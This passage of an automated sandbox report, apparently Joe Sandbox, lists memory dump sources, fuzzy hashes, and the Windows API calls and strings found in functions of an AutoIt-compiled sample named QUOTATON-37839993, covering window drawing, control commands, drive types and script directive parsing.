                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: ExceptionFilterUnhandled
                                                                      • String ID:
                                                                      • API String ID: 3192549508-0
                                                                      • Opcode ID: a816f6458c704e89912322086d106a0f1de0611329d945dc8b2641fa7f358b06
                                                                      • Instruction ID: 5b5a46477a0c8aed7dd83651fecdb38cdd4e60e6bbb12e351a11ec94d01ae46b
                                                                      • Opcode Fuzzy Hash: a816f6458c704e89912322086d106a0f1de0611329d945dc8b2641fa7f358b06
                                                                      • Instruction Fuzzy Hash: F6A0113000020CAB8A002B82EC08888BFACEB022A0B008020F80C800228B32A8208A80
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 4697dc1a10e53e7a9c76c9d0a345a700404826ee80276c436332f34d32584511
                                                                      • Instruction ID: a4e6a69b5c457d9185a7a4dbfda4e8224b789346571964ffe565ea51ae9faf86
                                                                      • Opcode Fuzzy Hash: 4697dc1a10e53e7a9c76c9d0a345a700404826ee80276c436332f34d32584511
                                                                      • Instruction Fuzzy Hash: 0A224632904506CBCF288A64C6A47FD7BA1FF41309F28A96BD94ABB492DB34DCC5C741
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                      • Instruction ID: 08e1d2010b67edf68475b205a1f00dc25462f041d29830877cf7ccee6f5866c0
                                                                      • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                      • Instruction Fuzzy Hash: B0C1AA322451B34ADF2D4639E43403EFBA15EA27B631B27ADD4B3EB1D4EE10DA25D610
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                      • Instruction ID: 8623e29c660fda2ebaeaaa50957f1f2c366dfc46035b6048000c667b12c12b4a
                                                                      • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                      • Instruction Fuzzy Hash: 21C176332051B349DF2D4639D43413EBAA15EE27B631B27ADD4B3EB1D4EE10CA25D620
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                      • Instruction ID: 1bdb8a0fb873dcf9955506ab9e1c6c1b0e4b639d491438a5290225f776ba2c8f
                                                                      • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                      • Instruction Fuzzy Hash: 96C194362450B349DF2D4639A43413EFBA15EB27B631B27EDD4B2EB1C4EE20CA65D610
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2184455170.000000000104D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0104D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_104d000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                      • Instruction ID: c591e5f25a6bdb9aee535db75a549ad1245ba244031223eea484f2979e9bd068
                                                                      • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                      • Instruction Fuzzy Hash: A341C271D1051CEBCF48CFADC991AAEBBF2AF88201F548299D516AB345D730AB41DB80
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2184455170.000000000104D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0104D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_104d000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                      • Instruction ID: 784c5e0a4e8622725fdc1aae9d78a23342906bb09d5045893c57e2763722b3f3
                                                                      • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                      • Instruction Fuzzy Hash: 1F019278A00209EFCB98EF98C5909AEF7F5FB48310F208599EC59A7345D730AE41DB90
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2184455170.000000000104D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0104D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_104d000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                      • Instruction ID: 4463b1076a71116b98a37f52086219ac94363df2e631b5b9f5de0f2d86f412cb
                                                                      • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                      • Instruction Fuzzy Hash: AA019278A00209EFCB84DF98C5909AEF7F5FB88310F208599EC59A7305D730AE41DB90
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2184455170.000000000104D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0104D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_104d000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                      • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                                                      • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                      • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                                                                      APIs
                                                                      • DeleteObject.GDI32(00000000), ref: 00E7785B
                                                                      • DeleteObject.GDI32(00000000), ref: 00E7786D
                                                                      • DestroyWindow.USER32 ref: 00E7787B
                                                                      • GetDesktopWindow.USER32 ref: 00E77895
                                                                      • GetWindowRect.USER32(00000000), ref: 00E7789C
                                                                      • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 00E779DD
                                                                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 00E779ED
                                                                      • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00E77A35
                                                                      • GetClientRect.USER32(00000000,?), ref: 00E77A41
                                                                      • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00E77A7B
                                                                      • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00E77A9D
                                                                      • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00E77AB0
                                                                      • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00E77ABB
                                                                      • GlobalLock.KERNEL32(00000000), ref: 00E77AC4
                                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00E77AD3
                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00E77ADC
                                                                      • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00E77AE3
                                                                      • GlobalFree.KERNEL32(00000000), ref: 00E77AEE
                                                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00E77B00
                                                                      • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00E92CAC,00000000), ref: 00E77B16
                                                                      • GlobalFree.KERNEL32(00000000), ref: 00E77B26
                                                                      • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00E77B4C
                                                                      • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00E77B6B
                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00E77B8D
                                                                      • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00E77D7A
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                      • String ID: $AutoIt v3$DISPLAY$static
                                                                      • API String ID: 2211948467-2373415609
                                                                      • Opcode ID: 5747380bb9e105e214de42500bde879e0e03d67bf6510794d86a9b8aa77f3c76
                                                                      • Instruction ID: a62c75c033a8d97ca1d06d1316db26de84a26a5ced57e75ba1bc7d7d618fb963
                                                                      • Opcode Fuzzy Hash: 5747380bb9e105e214de42500bde879e0e03d67bf6510794d86a9b8aa77f3c76
                                                                      • Instruction Fuzzy Hash: BD027B71900215EFDB14DFA5DC89EAEBBB9EF48310F108168F959BB2A1C730AD45CB60
                                                                      APIs
                                                                      • CharUpperBuffW.USER32(?,?,00E8F910), ref: 00E83627
                                                                      • IsWindowVisible.USER32(?), ref: 00E8364B
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: BuffCharUpperVisibleWindow
                                                                      • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                      • API String ID: 4105515805-45149045
                                                                      • Opcode ID: 0f4776ff137c399310870b2e0b2104d6c014f5137e7e60cbc227cdcc2a030811
                                                                      • Instruction ID: 92defa382b990c27fb9a7adaba43cdaa157359235c0e85ae7f53456fbbe92106
                                                                      • Opcode Fuzzy Hash: 0f4776ff137c399310870b2e0b2104d6c014f5137e7e60cbc227cdcc2a030811
                                                                      • Instruction Fuzzy Hash: F8D16E702043019BCB04FF20C552AAE77E5AF95754F546868F88A7B3E3DB21EE4ACB51
                                                                      APIs
                                                                      • SetTextColor.GDI32(?,00000000), ref: 00E8A630
                                                                      • GetSysColorBrush.USER32(0000000F), ref: 00E8A661
                                                                      • GetSysColor.USER32(0000000F), ref: 00E8A66D
                                                                      • SetBkColor.GDI32(?,000000FF), ref: 00E8A687
                                                                      • SelectObject.GDI32(?,00000000), ref: 00E8A696
                                                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 00E8A6C1
                                                                      • GetSysColor.USER32(00000010), ref: 00E8A6C9
                                                                      • CreateSolidBrush.GDI32(00000000), ref: 00E8A6D0
                                                                      • FrameRect.USER32(?,?,00000000), ref: 00E8A6DF
                                                                      • DeleteObject.GDI32(00000000), ref: 00E8A6E6
                                                                      • InflateRect.USER32(?,000000FE,000000FE), ref: 00E8A731
                                                                      • FillRect.USER32(?,?,00000000), ref: 00E8A763
                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00E8A78E
                                                                        • Part of subcall function 00E8A8CA: GetSysColor.USER32(00000012), ref: 00E8A903
                                                                        • Part of subcall function 00E8A8CA: SetTextColor.GDI32(?,?), ref: 00E8A907
                                                                        • Part of subcall function 00E8A8CA: GetSysColorBrush.USER32(0000000F), ref: 00E8A91D
                                                                        • Part of subcall function 00E8A8CA: GetSysColor.USER32(0000000F), ref: 00E8A928
                                                                        • Part of subcall function 00E8A8CA: GetSysColor.USER32(00000011), ref: 00E8A945
                                                                        • Part of subcall function 00E8A8CA: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00E8A953
                                                                        • Part of subcall function 00E8A8CA: SelectObject.GDI32(?,00000000), ref: 00E8A964
                                                                        • Part of subcall function 00E8A8CA: SetBkColor.GDI32(?,00000000), ref: 00E8A96D
                                                                        • Part of subcall function 00E8A8CA: SelectObject.GDI32(?,?), ref: 00E8A97A
                                                                        • Part of subcall function 00E8A8CA: InflateRect.USER32(?,000000FF,000000FF), ref: 00E8A999
                                                                        • Part of subcall function 00E8A8CA: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00E8A9B0
                                                                        • Part of subcall function 00E8A8CA: GetWindowLongW.USER32(00000000,000000F0), ref: 00E8A9C5
                                                                        • Part of subcall function 00E8A8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00E8A9ED
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                      • String ID:
                                                                      • API String ID: 3521893082-0
                                                                      • Opcode ID: d2abfc6a2cb0376f721fe65cd5d7cc46bae8e0d11a937379185e96d9a49e7f91
                                                                      • Instruction ID: 3bb08e8254bc433ca6a5f035f8322c1e0744d1fa8c8950b20a8ec2f3fb3062b1
                                                                      • Opcode Fuzzy Hash: d2abfc6a2cb0376f721fe65cd5d7cc46bae8e0d11a937379185e96d9a49e7f91
                                                                      • Instruction Fuzzy Hash: B5919F72008301FFDB10AF65DC08A5B7BA9FF88321F141B2AF56AB61A1D731D948DB52
                                                                      APIs
                                                                      • DestroyWindow.USER32(00000000), ref: 00E774DE
                                                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00E7759D
                                                                      • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00E775DB
                                                                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00E775ED
                                                                      • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00E77633
                                                                      • GetClientRect.USER32(00000000,?), ref: 00E7763F
                                                                      • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00E77683
                                                                      • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00E77692
                                                                      • GetStockObject.GDI32(00000011), ref: 00E776A2
                                                                      • SelectObject.GDI32(00000000,00000000), ref: 00E776A6
                                                                      • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00E776B6
                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00E776BF
                                                                      • DeleteDC.GDI32(00000000), ref: 00E776C8
                                                                      • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00E776F4
                                                                      • SendMessageW.USER32(00000030,00000000,00000001), ref: 00E7770B
                                                                      • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00E77746
                                                                      • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00E7775A
                                                                      • SendMessageW.USER32(00000404,00000001,00000000), ref: 00E7776B
                                                                      • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00E7779B
                                                                      • GetStockObject.GDI32(00000011), ref: 00E777A6
                                                                      • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00E777B1
                                                                      • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00E777BB
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                      • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                      • API String ID: 2910397461-517079104
                                                                      • Opcode ID: 163b8fb06e3fdf1f8fc0d09a785c64436da3d119ac19fc7f40907418f632af04
                                                                      • Instruction ID: 64dda31c5dce07395608681dac5b91639dd946f547d36137014bb2e2696c5e20
                                                                      • Opcode Fuzzy Hash: 163b8fb06e3fdf1f8fc0d09a785c64436da3d119ac19fc7f40907418f632af04
                                                                      • Instruction Fuzzy Hash: B2A16DB1A00605BFEB14DBA5DC4AFAE7BB9EB04710F008124FA19B72E1D771AD45CB64
                                                                      APIs
                                                                      • SetErrorMode.KERNEL32(00000001), ref: 00E6AD1E
                                                                      • GetDriveTypeW.KERNEL32(?,00E8FAC0,?,\\.\,00E8F910), ref: 00E6ADFB
                                                                      • SetErrorMode.KERNEL32(00000000,00E8FAC0,?,\\.\,00E8F910), ref: 00E6AF59
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorMode$DriveType
                                                                      • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                      • API String ID: 2907320926-4222207086
                                                                      • Opcode ID: 8a68a380e1b85cee7f220065545915c3def7c3b1d0975f23c01fe0f9d3ca2475
                                                                      • Instruction ID: 54f1975fdb77e11e61e83a6967f315fa8eff7d0a0c69af648e5f347ac5988aab
                                                                      • Opcode Fuzzy Hash: 8a68a380e1b85cee7f220065545915c3def7c3b1d0975f23c01fe0f9d3ca2475
                                                                      • Instruction Fuzzy Hash: 825184B4B842059ACB50DB60EA82CFA73E5EF487847287076E416B7291DA319D41DF53
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: __wcsnicmp
                                                                      • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                      • API String ID: 1038674560-86951937
                                                                      • Opcode ID: 27f2ebd623859b180aad64ff5a750302e413f81637226a160d0ee44d01c8ddea
                                                                      • Instruction ID: 6c8426c0385496d4e5863415a60ed2e10edb346c15d1568101ccd29c91b77933
                                                                      • Opcode Fuzzy Hash: 27f2ebd623859b180aad64ff5a750302e413f81637226a160d0ee44d01c8ddea
                                                                      • Instruction Fuzzy Hash: 7C81F5B1700315BADF20BA60EC46FAF37A8AF15704F047025F905BA1D6EB70DEA5C6A1
                                                                      APIs
                                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 00E89AD2
                                                                      • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00E89B8B
                                                                      • SendMessageW.USER32(?,00001102,00000002,?), ref: 00E89BA7
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$Window
                                                                      • String ID: 0
                                                                      • API String ID: 2326795674-4108050209
                                                                      • Opcode ID: ad681cdd8b27389019ff1590df87c84161c816dc4819ba4116fc7ca2b78b5e16
                                                                      • Instruction ID: d8d6c7d0602621ebcb51b831b186c3393f4349a2e3811f108f325be006a45262
                                                                      • Opcode Fuzzy Hash: ad681cdd8b27389019ff1590df87c84161c816dc4819ba4116fc7ca2b78b5e16
                                                                      • Instruction Fuzzy Hash: 7502DF31604201AFD729EF25C948BBABBE4FF49308F08552DF59DB62A2D735D844CB51
                                                                      APIs
                                                                      • GetSysColor.USER32(00000012), ref: 00E8A903
                                                                      • SetTextColor.GDI32(?,?), ref: 00E8A907
                                                                      • GetSysColorBrush.USER32(0000000F), ref: 00E8A91D
                                                                      • GetSysColor.USER32(0000000F), ref: 00E8A928
                                                                      • CreateSolidBrush.GDI32(?), ref: 00E8A92D
                                                                      • GetSysColor.USER32(00000011), ref: 00E8A945
